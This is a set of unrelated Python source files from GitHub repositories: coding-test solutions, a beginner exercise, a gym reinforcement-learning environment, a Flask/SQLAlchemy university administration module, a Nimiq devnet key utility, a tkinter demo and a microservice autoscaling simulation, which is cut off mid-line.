<= nx < n and 0 <= ny < n:\n if graph[nx][ny] == 0 and kill_tree[nx][ny] == 0:\n cnt += 1\n\n if cnt != 0:\n spread_amount = tree_amount // cnt\n\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if 0 <= nx < n and 0 <= ny < n:\n if graph[nx][ny] == 0 and kill_tree[nx][ny] == 0:\n new_graph[nx][ny] += spread_amount\n\n return new_graph\n\n\nd_dx = [1, 1, -1, -1]\nd_dy = [1, -1, 1, -1]\ndef most_tree_kill(x, y):\n global pre_x, pre_y, kill_amount\n\n value = graph[x][y]\n\n for i in range(4):\n cur_x, cur_y = x, y\n for _ in range(k):\n nx = cur_x + d_dx[i]\n ny = cur_y + d_dy[i]\n\n if not (0 <= nx < n and 0 <= ny < n):\n break\n\n if graph[nx][ny] <= 0:\n break\n\n if graph[nx][ny] >= 1:\n value += graph[nx][ny]\n cur_x, cur_y = nx, ny\n\n if kill_amount < value:\n pre_x, pre_y = x, y\n kill_amount = value\n\ndef kill_tree_time():\n for i in range(n):\n for j in range(n):\n if kill_tree[i][j] > 0:\n kill_tree[i][j] -= 1\n\n\ndef tree_kill(x, y):\n kill_tree[x][y] = c\n graph[x][y] = 0\n\n for i in range(4):\n cur_x, cur_y = x, y\n for _ in range(k):\n nx = cur_x + d_dx[i]\n ny = cur_y + d_dy[i]\n\n if not (0 <= nx < n and 0 <= ny < n):\n break\n\n if graph[nx][ny] <= 0:\n kill_tree[nx][ny] = c\n break\n\n if graph[nx][ny] >= 1:\n kill_tree[nx][ny] = c\n graph[nx][ny] = 0\n cur_x, cur_y = nx, ny\n\n# n=격자의 크기, m=박멸이 진행되는 년 수, k=제초제의 확산 범위, c=제초제가 남아있는 년 수\nn, m, k, c = map(int, input().split())\ngraph = [list(map(int, input().split())) for _ in range(n)]\n# 제초제가 남아있는 년 수 저장 배열\nkill_tree = [[0] * n for _ in range(n)]\n\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n# 출력 조건, m년 동안 박멸한 나무의 총 그루 수\nanswer = 0\nfor _ in range(m):\n # 1. 나무의 성장\n grow()\n\n # 2. 나무의 번식\n graph = spread()\n\n # 3. 제초제 뿌릴 구역 정하기\n pre_x, pre_y = 0, 0\n kill_amount = 0\n for i in range(n):\n for j in range(n):\n if graph[i][j] >= 1:\n most_tree_kill(i, j)\n\n # 4. 제초제 시간을 줄여준다\n kill_tree_time()\n\n # 5. 
제초제를 살포한다\n tree_kill(pre_x, pre_y)\n\n answer += kill_amount\n\nprint(answer)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/코테재활/삼성 역테 재활/solution65.py","file_name":"solution65.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9293598499","text":"import subprocess\nfrom topology_settings import TopologySettings\n\n\ndef __nimiq_schnorr(topology_settings: TopologySettings):\n command = [\"cargo\", \"run\"]\n if topology_settings.get_release():\n command.append(\"--release\")\n command.extend([\"--bin\", \"nimiq-address\"])\n output = subprocess.check_output(\n command, text=True, cwd=topology_settings.get_nimiq_dir(),\n stderr=subprocess.DEVNULL)\n return output.splitlines()\n\n\ndef __nimiq_bls(topology_settings: TopologySettings):\n command = [\"cargo\", \"run\"]\n if topology_settings.get_release():\n command.append(\"--release\")\n command.extend([\"--bin\", \"nimiq-bls\"])\n output = subprocess.check_output(\n command, text=True, cwd=topology_settings.get_nimiq_dir(),\n stderr=subprocess.DEVNULL)\n return output.splitlines()\n\n\ndef create_bls_keypair(topology_settings: TopologySettings):\n lines = []\n for line in __nimiq_bls(topology_settings):\n line = line.strip()\n if line and not line.startswith(\"#\"):\n lines.append(line)\n return {\n \"public_key\": lines[0],\n \"private_key\": lines[1]\n }\n\n\ndef create_schnorr_keypair(topology_settings: TopologySettings):\n lines = []\n for i, l in enumerate(__nimiq_schnorr(topology_settings)):\n lines.append(l.split(\":\")[1].strip())\n return {\n \"address\": lines[0],\n \"address_raw\": lines[1],\n \"public_key\": lines[2],\n \"private_key\": lines[3]\n }\n","repo_name":"nimiq/core-rs-albatross","sub_path":"scripts/devnet/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"37"} +{"seq_id":"22984420675","text":"# Leonardo L. 
Alonso Carriço\n# leonardo@carrico.com.br\n\n# Exercício Prático Python [24/09] 02\n\n###################################################################\n# 2) Faça um Programa que leia três números inteiros e mostre o maior deles.\n\nnum1 = int(input(\"\\nEntre com o primeiro número inteiro : \"))\nnum2 = int(input(\"\\nEntre com o segundo número inteiro : \"))\nnum3 = int(input(\"\\nEntre com o terceiro número inteiro : \"))\n\nif num1 > num2 and num1 > num3 :\n print(f\"\\n{num1} É o maior número\\n\")\n\nelif num2 > num1 and num2 > num3 :\n print(f\"\\n{num2} É o maior número\\n\")\n\nelif num3 > num1 and num3 > num2 :\n print(f\"\\n{num3} É o maior número\\n\")","repo_name":"oleoalonso/atvPython-24-09","sub_path":"exerPython-24-09-02.py","file_name":"exerPython-24-09-02.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71291421227","text":"import numpy as np\nimport gym\nfrom gym import spaces\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\nGRAPHING = True\n\nif GRAPHING:\n\tplt.ion()\n\tfig = plt.figure()\n\n\tdataWin = []\n\tdata10Win = []\n\tdataRew = []\n\tdata10Rew = []\n\n\tavgPer = 10\n\n\tdef update(w, r):\n\t\tdataWin.append(w)\n\t\tdataRew.append(r)\n\n\t\tif len(dataWin) % avgPer == 0:\n\t\t\tdata10Win.append(sum(dataWin[-avgPer:]) / avgPer)\n\t\t\tdata10Rew.append(sum(dataRew[-avgPer:]) / avgPer)\n\n\t\tfig.clf()\n\t\tplt.subplot(2, 1, 1)\n\t\tplt.plot(np.arange(len(data10Win)) * avgPer, data10Win)\n\t\tplt.ylabel(\"win percent\")\n\n\t\tplt.subplot(2, 1, 2)\n\t\tplt.plot(np.arange(len(data10Rew)) * avgPer, data10Rew)\n\t\tplt.ylabel(\"avg reward\")\n\nclass BotGym(gym.Env):\n\t_seed = 42\n\tviewer = None\n\n\tavgReward = 0\n\n\tdef __init__(self):\n\t\tself.max = 300\n\t\tself.speed = 2.0\n\n\t\tself.action_num = 2\n\t\tself.observation_num = 3\n\n\t\tself.avgReward = 0\n\n\t\tself.action_space = spaces.Box(low=-self.max, high=self.max, shape=(self.action_num, ), dtype=np.float32)\n\t\tself.observation_space = spaces.Box(low=-self.max, high=self.max, shape=(self.observation_num, ) , dtype=np.float32)\n\n\tdef step(self, action):\n\t\ta0 = action[0] * self.speed / self.max\n\t\ta1 = action[1] * self.speed / self.max\n\n\t\tself.x += a0 * math.sin(math.radians(self.angle))\n\t\tself.y += a0 * math.cos(math.radians(self.angle))\n\n\t\tself.angle += a1\n\n\t\tdistX = abs(self.x - self.target_x)\n\t\tdistY = abs(self.y - self.target_y)\n\n\t\t#a1 = math.radians(90 - self.angle)\n\t\t#a2 = math.atan2(self.target_y - self.y, self.target_x - self.x)\n\t\t#a = math.atan2(math.sin(a1-a2), math.cos(a1-a2))\n\t\t#reward = -(a ** 2) * 10#-(distX ** 2 + distY ** 2) / 2500\n\n\t\treward = -(distX ** 2 + distY ** 2) / 5000\n\n\t\tdone = distX < 10 and distY < 10\n\t\tif done:\n\t\t\treward = 10\n\t\t\tself.win = 1.0\n\n\t\tself.avgReward += reward\n\t\treturn self.get_info(), reward, done, {}\n\n\tdef reset(self):\n\t\tself.x = random.randint(10,490)\n\t\tself.y = random.randint(10,490)\n\t\tself.angle = 0#45\n\n\t\tself.target_x = 250\n\t\tself.target_y = 250\n\n\t\tif GRAPHING and self.viewer:\n\t\t\tupdate(self.win, self.avgReward / 200.0)\n\n\t\tself.avgReward = 0\n\t\tself.win = 0\n\n\t\treturn self.get_info()\n\n\tdef render(self, mode='human', close=False):\n\t\tif self.viewer is None:\n\t\t\tfrom gym.envs.classic_control import rendering\n\n\t\t\tself.viewer = rendering.Viewer(500,500)\n\n\t\t\ttarget = 
rendering.make_circle(10)\n\t\t\tself.target_transform = rendering.Transform()\n\t\t\ttarget.add_attr(self.target_transform)\n\t\t\ttarget.set_color(0,255,0)\n\t\t\tself.viewer.add_geom(target)\n\n\t\t\tbot = rendering.make_capsule(10,20)\n\t\t\tself.bot_transform = rendering.Transform()\n\t\t\tbot.add_attr(self.bot_transform)\n\t\t\tbot.set_color(0,0,255)\n\t\t\tself.viewer.add_geom(bot)\n\n\t\tself.target_transform.set_translation(self.target_x, self.target_y)\n\t\tself.bot_transform.set_rotation(math.radians(90 - self.angle))\n\t\tself.bot_transform.set_translation(self.x, self.y)\n\n\t\treturn self.viewer.render(return_rgb_array = mode=='rgb_array')\n\n\tdef get_info(self):\n\t\tx = max(min(self.target_x - self.x, self.max), -self.max)\n\t\ty = max(min(self.target_y - self.y, self.max), -self.max)\n\n\t\tangle_sin = math.sin( math.radians(self.angle) ) * self.max\n\t\tangle_cos = math.cos( math.radians(self.angle) ) * self.max\n\n\t\ta1 = math.radians(90 - self.angle)\n\t\ta2 = math.atan2(self.target_y - self.y, self.target_x - self.x)\n\n\t\tangle_offset = math.atan2(math.sin(a1-a2), math.cos(a1-a2)) / math.pi * self.max\n\n\t\treturn np.array([x, y, angle_offset])\n","repo_name":"FelixMo42/artiBlue","sub_path":"environments/envs/bot_gym.py","file_name":"bot_gym.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34738868106","text":"import hashlib\n\nfrom docenti import *\nfrom studenti import *\nfrom classi import *\n\n\"\"\"\nla funzione add_degree_course_aux riceve come parametro il codice del corso di laurea, il nome del corso di laurea, \nla specializzazione e l'indirizzo e aggiunge il corso di laurea attraverso la INSERT\n@param cod_corso: codice del corso di laurea\n@param nome_corso: nome del corso di laurea\n@param spec: specializzazione del corso di laurea\n@param indirizzo: indirizzo del corso di laurea\n@param mysql: connessione al database\n\"\"\"\n\n\ndef add_degree_course_aux(cod_corso, nome_corso, spec, indirizzo):\n corso_laurea = Corsi_di_Laurea(\n CodCorsoLaurea=cod_corso,\n NomeCorsoLaurea=nome_corso,\n Specializzazione=spec,\n indirizzo=indirizzo,\n )\n db.session.add(corso_laurea)\n db.session.commit()\n\n\n\"\"\"\nla funzione get_degree_course riceve come parametro la connessione al database e restituisce tutti i corsi di laurea\nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return corsi: lista dei corsi di laurea\n\"\"\"\n\n\ndef get_degree_course():\n corsi = []\n rows = Corsi_di_Laurea.query.all()\n if rows:\n for row in rows:\n codice = row.CodCorsoLaurea\n nome = row.NomeCorsoLaurea\n specializzazione = row.Specializzazione\n indirizzo = row.indirizzo\n corso_info = {\n \"codice\": codice,\n \"nome\": nome,\n \"specializzazione\": specializzazione,\n \"indirizzo\": indirizzo,\n }\n corsi.append(corso_info)\n\n return corsi\n\n\n\"\"\"\nla funzione delete_degree_course_aux_post riceve come parametro il codice del corso di laurea da eliminare\ne lo elimina attraverso la DELETE\n@param codice_corso: codice del corso di laurea da eliminare\n@param mysql: connessione al database\nvedere delete_corso_corsoLaurea_aux_post per ulteriori dettagli\n\"\"\"\n\n\ndef delete_degree_course_aux_post(codice_corso):\n delete_corso_corsoLaurea_aux_post(codice_corso, None)\n Corsi_di_Laurea.query.filter_by(CodCorsoLaurea=codice_corso).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione add_course_aux riceve come 
parametro il codice del corso, il nome del corso e aggiunge il corso attraverso la INSERT\n@param codice: codice del corso\n@param nome: nome del corso\n@param mysql: connessione al database\n\"\"\"\n\n\ndef add_course_aux(codice, nome, valore):\n corso = Corsi(CodiceCorso=codice, NomeCorso=nome, Valore=valore)\n db.session.add(corso)\n db.session.commit()\n\n\n\"\"\"\nla funzione delete_course_aux_post riceve come parametro il codice del corso da eliminare\ne lo elimina attraverso la DELETE\n@param codice_corso: codice del corso da eliminare\n@param mysql: connessione al database\nvedere delete_corso_corsoLaurea_aux_post per ulteriori dettagli\n\"\"\"\n\n\ndef delete_course_aux_post(codice_corso):\n delete_corso_corsoLaurea_aux_post(None, codice_corso)\n Corsi.query.filter_by(CodiceCorso=codice_corso).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione get_course riceve come parametro la connessione al database e restituisce tutti i corsi\nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return corsi: lista dei corsi\n\"\"\"\n\n\ndef get_course():\n corsi = []\n rows = Corsi.query.all()\n if rows:\n for row in rows:\n corso_info = {\n \"codice\": row.CodiceCorso,\n \"nome\": row.NomeCorso,\n }\n corsi.append(corso_info)\n\n return corsi\n\n\n\"\"\"\nla funzione add_corso_corsoLaurea_aux riceve come parametro il codice del corso di laurea, il codice del corso e l'anno di insegnamento\ne aggiunge il corso attraverso la INSERT\n@param corso_laurea: codice del corso di laurea\n@param corso: codice del corso\n@param anno: anno di insegnamento\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef assegnaCorsoCorsoLaurea_aux(corso_laurea, corso, anno):\n appart = Appartenenti(CorsoLaurea=corso_laurea, CodCorso=corso, Anno=anno)\n db.session.add(appart)\n db.session.commit()\n\n\n\"\"\"\nla funzione add_docente_aux riceve come parametro i dati del docente contenuti in doc e aggiunge il docente attraverso la INSERT\n@param doc: dati del docente\n@param mysql: connessione al database\nsi controlla che il codice fiscale non sia già presente tra gli studenti\n\n\"\"\"\n\n\ndef add_docente_aux(doc):\n pwd = doc[\"password\"]\n hash_password = hashlib.sha256(pwd.encode(\"utf-8\"))\n hash_value = hash_password.hexdigest()\n\n codicefiscale = doc[\"codice_fiscale\"]\n\n if is_cf_present_in_studenti(codicefiscale):\n raise ValueError(\"Codice fiscale già presente tra gli studenti\")\n\n docente = Docenti(\n CodiceFiscale=doc[\"codice_fiscale\"],\n Nome=doc[\"nome\"],\n Cognome=doc[\"cognome\"],\n mail=doc[\"mail\"],\n annoNascita=doc[\"anno_nascita\"],\n password=hash_value,\n )\n\n db.session.add(docente)\n db.session.commit()\n\n\n\"\"\"\nla funzione delete_docenti_aux riceve come parametro il codice fiscale del docente da eliminare\ne lo elimina attraverso la DELETE\n@param codice_fiscale: codice fiscale del docente da eliminare\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef delete_docenti_aux(codice_fiscale):\n Docenti.query.filter_by(CodiceFiscale=codice_fiscale).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione get_docenti riceve come parametro la connessione al database e restituisce tutti i docenti \nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return docenti: lista dei docenti\n\n\"\"\"\n\n\ndef get_docenti():\n docenti = []\n rows = Docenti.query.with_entities(\n Docenti.CodiceFiscale,\n Docenti.Nome,\n Docenti.Cognome,\n Docenti.mail,\n 
Docenti.annoNascita,\n )\n if rows:\n for row in rows:\n doc_info = {\n \"codice_fiscale\": row.CodiceFiscale,\n \"nome\": row.Nome,\n \"cognome\": row.Cognome,\n \"mail\": row.mail,\n \"anno_di_nascita\": row.annoNascita,\n }\n docenti.append(doc_info)\n return docenti\n\n\ndef is_valid_mail(matricola, mail):\n valid_mail = matricola + \"@stud.unive.it\"\n return mail == valid_mail\n\n\n\"\"\"\nla funzione get_course_degree_course riceve come parametro la connessione al database e restituisce tutti i corsi di laurea e i corsi\nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return dettagli: lista dei corsi di laurea e dei corsi\n\n\"\"\"\n\n\ndef get_course_degree_course():\n dettagli = []\n rows = Appartenenti.query.all()\n if rows:\n for row in rows:\n info = {\n \"CorsoLaurea\": row.CorsoLaurea,\n \"CodCorso\": row.CodCorso,\n }\n dettagli.append(info)\n return dettagli\n\n\n\"\"\"\nla funzione delete_corso_corsoLaurea_aux_post riceve come parametro il codice del corso di laurea e il codice del corso\ne li elimina attraverso la DELETE\n@param deg_course: codice del corso di laurea\n@param course: codice del corso\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef delete_corso_corsoLaurea_aux_post(deg_course, course):\n Appartenenti.query.filter_by(CorsoLaurea=deg_course, CodCorso=course).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione assegna_Corso_Docente_aux riceve come parametro il codice fiscale del docente e il codice del corso\ne li aggiunge attraverso la INSERT\n@param docente: codice fiscale del docente\n@param corso: codice del corso\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef assegna_Corso_Docente_aux(docente, corso):\n doc_ins = Insegna(CodCorso=corso, CodFiscale=docente)\n db.session.add(doc_ins)\n db.session.commit()\n\n\n\"\"\"\nla funzione get_temporaryuser riceve come parametro la connessione al database e restituisce tutti gli studenti\nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return user: lista degli studenti\n\n\"\"\"\n\n\ndef get_temporaryuser():\n users = []\n rows = TemporaryUser.query.all()\n\n # Retrieve the results\n\n if rows:\n for row in rows:\n info = {\n \"codiceFiscale\": row.CodiceFiscale,\n \"nome\": row.Nome,\n \"cognome\": row.Cognome,\n \"mail\": row.mail,\n \"annoNascita\": row.annoNascita,\n \"matricola\": row.matricola,\n \"password\": row.password,\n \"CorsoLaurea\": row.CorsoLaurea,\n }\n users.append(info)\n return users\n\n\n\"\"\"\nla funzione delete_tempuser riceve come parametro il codice fiscale dello studente da eliminare\ne lo elimina attraverso la DELETE\n@param cf: codice fiscale dello studente da eliminare\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef delete_tempuser(cf):\n TemporaryUser.query.filter_by(CodiceFiscale=cf).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione add_user riceve come parametro lo studente da aggiungere e lo aggiunge attraverso la INSERT\n@param stud: studente da aggiungere\n@param mysql: connessione al database\nvengono fatti dei controlli sulla matricola, sulla mail e sul codice fiscale\nse i controlli sono corretti viene eseguita la INSERT\n\n\"\"\"\n\n\ndef add_user(stud):\n studente = Studenti(\n CodiceFiscale=stud[\"codice_fiscale\"],\n Nome=stud[\"nome\"],\n Cognome=stud[\"cognome\"],\n annoNascita=stud[\"annoNascita\"],\n mail=stud[\"mail\"],\n matricola=stud[\"matricola\"],\n password=stud[\"password\"],\n 
CorsoLaurea=stud[\"corso_laurea\"],\n )\n db.session.add(studente)\n db.session.commit()\n\n\n\"\"\"\nla funzione get_studenti riceve come parametro la connessione al database e restituisce tutti gli studenti\nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return users: lista degli studenti\n\n\"\"\"\n\n\ndef get_studenti():\n users = []\n rows = Studenti.query.all()\n if rows:\n for row in rows:\n info = {\n \"codiceFiscale\": row.CodiceFiscale,\n \"nome\": row.Nome,\n \"cognome\": row.Cognome,\n \"mail\": row.mail,\n \"annoNascita\": row.annoNascita,\n \"matricola\": row.matricola,\n \"password\": row.password,\n \"CorsoLaurea\": row.CorsoLaurea,\n }\n users.append(info)\n return users\n\n\n\"\"\"\nla funzione delete_aux riceve come parametro il codice fiscale dello studente da eliminare \ne lo elimina attraverso la DELETE\n@param cf: codice fiscale dello studente da eliminare\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef delete_aux(cf):\n Studenti.query.filter_by(CodiceFiscale=cf).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione get_course_docenti riceve come parametro la connessione al database e restituisce tutti i corsi e i docenti\nche insegnano quel corso attraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return data: lista dei corsi e dei docenti\n\n\"\"\"\n\n\ndef get_course_docenti():\n data = []\n rows = Insegna.query.all()\n if rows:\n for row in rows:\n info = {\"Corso\": row.CodCorso, \"Docente\": row.CodFiscale}\n data.append(info)\n return data\n\n\n\"\"\"\nla funzione delete_corso_Docente_aux riceve come parametro il codice fiscale del docente e il codice del corso da eliminare\ne li elimina attraverso la DELETE\n@param doc_cf: codice fiscale del docente\n@param code_course: codice del corso da eliminare\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef delete_corso_Docente_aux(doc_cf, code_course):\n Insegna.query.filter_by(CodCorso=code_course, CodFiscale=doc_cf).delete()\n db.session.commit()\n","repo_name":"JayRen432/Progetto-BD","sub_path":"administrator.py","file_name":"administrator.py","file_ext":"py","file_size_in_byte":11739,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22740585699","text":"from scan_2D import plot_everything_from_TCT_2D_scan\nfrom the_bureaucrat.bureaucrats import RunBureaucrat # https://github.com/SengerM/the_bureaucrat\nfrom pathlib import Path\nimport logging\n\nif __name__ == '__main__':\n\timport argparse\n\tfrom plotly_utils import set_my_template_as_default\n\timport sys\n\t\n\tlogging.basicConfig(\n\t\tstream = sys.stderr, \n\t\tlevel = logging.INFO,\n\t\tformat = '%(asctime)s|%(levelname)s|%(funcName)s|%(message)s',\n\t\tdatefmt = '%Y-%m-%d %H:%M:%S',\n\t)\n\t\n\tset_my_template_as_default()\n\t\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--dir',\n\t\tmetavar = 'path', \n\t\thelp = 'Path to the base measurement directory.',\n\t\trequired = True,\n\t\tdest = 'directory',\n\t\ttype = str,\n\t)\n\t\n\targs = parser.parse_args()\n\t\n\tbureaucrat = RunBureaucrat(Path(args.directory))\n\tplot_everything_from_TCT_2D_scan(bureaucrat)\n","repo_name":"SengerM/tct_setup","sub_path":"plot_2D_scan.py","file_name":"plot_2D_scan.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33864502344","text":"# -*- coding: utf-8 
-*-\r\n\"\"\"\r\nCreated on Wed May 6 01:40:24 2020\r\n\r\n@author: 1buraknegis\r\n\"\"\"\r\n\r\n\r\nimport tkinter as tk\r\nimport random as rd\r\n\r\nform = tk.Tk()\r\nform.title(\"Tekrar Uygulaması\")\r\nform.geometry(\"500x400+500+350\")\r\n\r\nliste = []\r\nfor i in range(5):\r\n while len(liste) != 6:\r\n a = rd.randint(1,50)\r\n if a not in liste:\r\n liste.append(a)\r\n\r\ndef goster():\r\n label.config(text = liste, bg = \"green\")\r\n \r\n\r\ndef saydamlastir():\r\n form.wm_attributes(\"-alpha\", 0.3)\r\n \r\ndef dondur():\r\n form.wm_attributes(\"-alpha\", 0.9)\r\n\r\ndef max_yap():\r\n form.state(\"zoomed\")\r\n \r\ndef min_yap():\r\n form.state(\"iconic\")\r\n \r\nlabel = tk.Label(form, fg =\"red\", bg = \"red\", font = \"Times 20 bold\")\r\nlabel.pack()\r\n\r\ngoster = tk.Button(form, text = \"göster\", fg = \"black\", bg =\"yellow\", command = goster)\r\ngoster.pack(side = tk.LEFT)\r\n\r\ngoster = tk.Button(form, text = \"saydamlaştır\", fg = \"black\", bg =\"yellow\", command = saydamlastir)\r\ngoster.pack(side = tk.LEFT)\r\n\r\ngoster = tk.Button(form, text = \"döndür\", fg = \"black\", bg =\"yellow\", command = dondur)\r\ngoster.pack(side = tk.LEFT)\r\n\r\ngoster = tk.Button(form, text = \"max yap\", fg = \"black\", bg =\"yellow\", command = max_yap)\r\ngoster.pack(side = tk.LEFT)\r\n\r\ngoster = tk.Button(form, text = \"min yap\", fg = \"black\", bg =\"yellow\", command = min_yap)\r\ngoster.pack(side = tk.LEFT)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nform.mainloop()","repo_name":"1buraknegis/Python-Tkinter-examples","sub_path":"tkinter_ornek1.py","file_name":"tkinter_ornek1.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69937962029","text":"import copy\n\n\nimport networkx as nx\n\nfrom applications.hotelreservationservice import*\nfrom applications.sockshopmicroservice import *\nfrom dag import DAG\nfrom generators import *\nfrom controllers import *\nfrom monitoring import Monitoring\nfrom node import Node\nfrom simulationdependences import SimulationWithDependeciesDAG\n\nclass MainHotelDependency:\n def __init__(self, filename='', dag=None):\n self.filename = filename\n self.dag = dag\n\n def run(self, filename=''):\n stime = 0.274\n appSLA = stime\n horizon = 1200\n alfa=0.5\n monitoringWindow = 1\n initCores = 2.5\n period = 1\n search_sla = appSLA\n profile_sla = 0.095\n geo_sla = 0.068\n rate_sla = 0.079\n\n total_weight = 0.00506\n slas=[appSLA, profile_sla,geo_sla ,rate_sla]\n\n\n apps = [Search(appSLA, init_cores=initCores), Profile(appSLA, init_cores=initCores), Geo(appSLA, init_cores=initCores),\n Rate(appSLA, init_cores=initCores)]\n appNames = ['Sch', 'Prf', 'Geo', 'Rat']\n\n mns = [Monitoring(monitoringWindow, appSLA, local_sla=search_sla),\n Monitoring(monitoringWindow, appSLA, local_sla=profile_sla),\n Monitoring(monitoringWindow, appSLA, local_sla=geo_sla),\n Monitoring(monitoringWindow, appSLA, local_sla=rate_sla)]\n\n sts=[]\n i = 0\n for app in apps:\n st = alfa * app.weight / total_weight\n localSLA = slas[i] if slas[i] > 0.0 else app.weight* 2\n if localSLA*3/4 < st*appSLA or localSLA/2 > st*appSLA:\n sts.append(0.5 * localSLA / appSLA)\n else:\n sts.append(st)\n i = i+1\n\n g=[]\n\n for i in range(0,4):\n g.append(ZeroGen())\n g[i - 1].setName(\"ZG -\" + str(appNames[i]))\n\n times = []\n req = [114,20,63,57,72,45,35,36,37,105,102,105,41,47,118,101,58,120,101,34,33,93,112,117]\n for i in range(1,25):\n times.append(i*50)\n req[i-1] = 
req[i-1] *40#*40 bottleneck\n\n\n c0 = CTControllerScaleDependency(period, initCores, BC=0.001, DC=0.02, max_cores=apps[0].max_cores, st=sts[0]); c0.setName(\"ScaleX\")\n c1 = CTControllerScaleDependency(period, initCores, BC=0.0001, DC=0.002, max_cores=apps[1].max_cores, st=sts[1]); c1.setName(\"ScaleX\")\n c2 = CTControllerScaleDependency(period, initCores, BC=0.0001, DC=0.002, max_cores=apps[2].max_cores, st=sts[2]); c2.setName(\"ScaleX\")\n c3 = CTControllerScaleDependency(period, initCores, BC=0.0001, DC=0.002, max_cores=apps[3].max_cores, st=sts[3]); c3.setName(\"ScaleX\")\n\n\n\n c0.setSLA(apps[0].sla); c1.setSLA(apps[1].sla); c2.setSLA(apps[2].sla); c3.setSLA(apps[3].sla)\n\n c0.setMonitoring(mns[0]); c1.setMonitoring(mns[1]); c2.setMonitoring(mns[2]); c3.setMonitoring(mns[3])\n\n\n g[0] = RampGen(1, 90, 10); g[0].setName(\"RP - Search\")\n\n #g[1] = RampGen(1, 90, 10); g[1].setName(\"RP - Prof\")\n g[1] = StepGen(times, req); g[1].setName(\"STP - Prof\")\n\n c0.setGenerator(g[0]); c1.setGenerator(g[1]); c2.setGenerator(g[2]); c3.setGenerator(g[3])\n\n dg = nx.DiGraph([('Sch', \"Prf\"), (\"Sch\", \"Geo\"), (\"Sch\", \"Rat\")])\n\n dag_model = DAG(dg, 'Sch')\n dg_dep = dag_model.dag\n sync = 1\n\n for edge in dg_dep.edges:\n dg_dep.edges[edge]['times'] = 1\n dg_dep.edges[edge]['sync'] = sync\n dg_dep.edges[(\"Sch\", \"Prf\")]['sync'] = 2\n dg_dep.edges[(\"Sch\", \"Rat\")]['sync'] = 3\n\n\n dg_dep.nodes['Sch']['node'] = Node(horizon, c0, apps[0], monitoring=mns[0], name='Sch', generator=g[0], local_sla=search_sla) # local sla set by user\n dg_dep.nodes['Prf']['node'] = Node(horizon, c1, apps[1], monitoring=mns[1], name='Prf', generator=g[1], local_sla=profile_sla)\n dg_dep.nodes['Geo']['node'] = Node(horizon, c2, apps[2], monitoring=mns[2], name='Geo', generator=g[2], local_sla=geo_sla)\n dg_dep.nodes['Rat']['node'] = Node(horizon, c3, apps[3], monitoring=mns[3], name='Rat', generator=g[3], local_sla=rate_sla)\n\n for node in dg_dep:\n dg_dep.nodes[node]['users'] = 0\n dg_dep.nodes[node]['node'].total_weight = total_weight # given by user\n dg_dep.nodes[node]['node'].subtotal_weight = dg.nodes[node]['node'].app.weight\n\n simul = SimulationWithDependeciesDAG(horizon, dag_model, 'Sch')\n\n simul.run()\n\n simul.plot()\n simul.plot(isTotalRT=False)\n # MAP VISUALIZATION\n dag_model.updateForVisualization('Sch')\n\n dag_model.print_dag('users', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('rt', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('st', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('lrt', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('app', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('cores', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('cores_deviation', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('rt_deviation', show_sync=True, show_times=True,label='hotel_dependency-normal')\n self.dag = dag_model\n dag_model.computeStatiscalTables(filename)\n\n def computeFinalTable(self):\n self.dag.computeResultTable()\n\n #\nfor i in range(11):\n MainHotelDependency().run(\"experiments/neptuneplus/%s-%d\" % (\"hotel/statistical\", i))\n\nDAG(nx.DiGraph(), 
